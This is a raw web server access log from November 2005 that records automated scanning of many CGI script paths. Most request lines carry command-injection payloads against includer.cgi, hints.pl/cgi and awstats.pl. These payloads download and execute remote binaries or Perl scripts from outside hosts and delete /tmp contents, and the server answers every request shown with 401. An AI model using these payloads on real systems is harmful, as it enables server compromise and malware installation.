22:28:27 61.194.16.4 POST /phpgroupware/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:27 61.194.16.3 POST /phpgroupware/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:29 61.194.16.4 GET /cgi-bin/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:29 61.194.16.3 GET /cgi-bin/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:30 61.194.16.4 GET /scgi-bin/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:30 61.194.16.3 GET /scgi-bin/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:32 61.194.16.4 GET /includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:32 61.194.16.3 GET /includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:33 61.194.16.4 GET /cgi-bin/include/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:33 61.194.16.3 GET /cgi-bin/include/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:34 61.194.16.4 GET /scgi-bin/include/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:34 61.194.16.3 GET /scgi-bin/include/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:35 61.194.16.4 GET /cgi-bin/inc/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:35 61.194.16.3 GET /cgi-bin/inc/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:36 61.194.16.4 GET /scgi-bin/inc/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:36 61.194.16.3 GET /scgi-bin/inc/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:37 61.194.16.4 GET /cgi-local/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:37 61.194.16.3 GET /cgi-local/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:38 61.194.16.4 GET /scgi-local/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:38 61.194.16.3 GET /scgi-local/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:39 61.194.16.4 GET /cgi/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:39 61.194.16.3 GET /cgi/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:41 61.194.16.4 GET /scgi/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:41 61.194.16.3 GET /scgi/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:42 61.194.16.4 GET /hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:42 61.194.16.3 GET /hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:43 61.194.16.4 GET /cgi/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:43 61.194.16.3 GET /cgi/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:44 61.194.16.4 GET /scgi/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:44 61.194.16.3 GET /scgi/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:45 61.194.16.4 GET /cgi-bin/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:45 61.194.16.3 GET /cgi-bin/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:46 61.194.16.4 GET /scgi-bin/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:46 61.194.16.3 GET /scgi-bin/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:47 61.194.16.4 GET /hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:47 61.194.16.3 GET /hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:48 61.194.16.4 GET /cgi-bin/hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:48 61.194.16.3 GET /cgi-bin/hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:50 61.194.16.4 GET /scgi-bin/hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:50 61.194.16.3 GET /scgi-bin/hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:51 61.194.16.4 GET /webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:51 61.194.16.3 GET /webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:52 61.194.16.4 GET /cgi-bin/webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:52 61.194.16.3 GET /cgi-bin/webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:53 61.194.16.4 GET /scgi-bin/webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:53 61.194.16.3 GET /scgi-bin/webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:54 61.194.16.4 GET /hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:54 61.194.16.3 GET /hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:55 61.194.16.4 GET /cgi/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:55 61.194.16.3 GET /cgi/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:56 61.194.16.4 GET /scgi/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:56 61.194.16.3 GET /scgi/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:57 61.194.16.4 GET /cgi-bin/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:57 61.194.16.3 GET /cgi-bin/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:59 61.194.16.4 GET /scgi-bin/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:59 61.194.16.3 GET /scgi-bin/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:00 61.194.16.4 GET /hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:00 61.194.16.3 GET /hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:01 61.194.16.4 GET /cgi-bin/hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:01 61.194.16.3 GET /cgi-bin/hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:02 61.194.16.4 GET /scgi-bin/hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:02 61.194.16.3 GET /scgi-bin/hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:03 61.194.16.4 GET /webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:03 61.194.16.3 GET /webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:04 61.194.16.4 GET /cgi-bin/webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:04 61.194.16.3 GET /cgi-bin/webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:05 61.194.16.4 GET /scgi-bin/webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:29:05 61.194.16.3 GET /scgi-bin/webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-05 01:39:19 61.194.16.3 GET /cgi-bin/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 2005-11-05 01:39:19 61.194.16.3 GET /awstats/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 2005-11-05 01:39:19 61.194.16.3 GET /cgi/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 2005-11-05 01:39:19 61.194.16.3 GET /stats/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 2005-11-05 01:39:19 61.194.16.3 GET /stats/awstats/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 2005-11-05 01:39:19 61.194.16.3 GET /stats/cgi-bin/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 2005-11-05 01:39:20 61.194.16.4 GET /cgi-bin/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 2005-11-05 01:39:20 61.194.16.4 GET /awstats/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 2005-11-05 01:39:20 61.194.16.4 GET /cgi/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 2005-11-05 01:39:20 61.194.16.4 GET /stats/awstats.pl 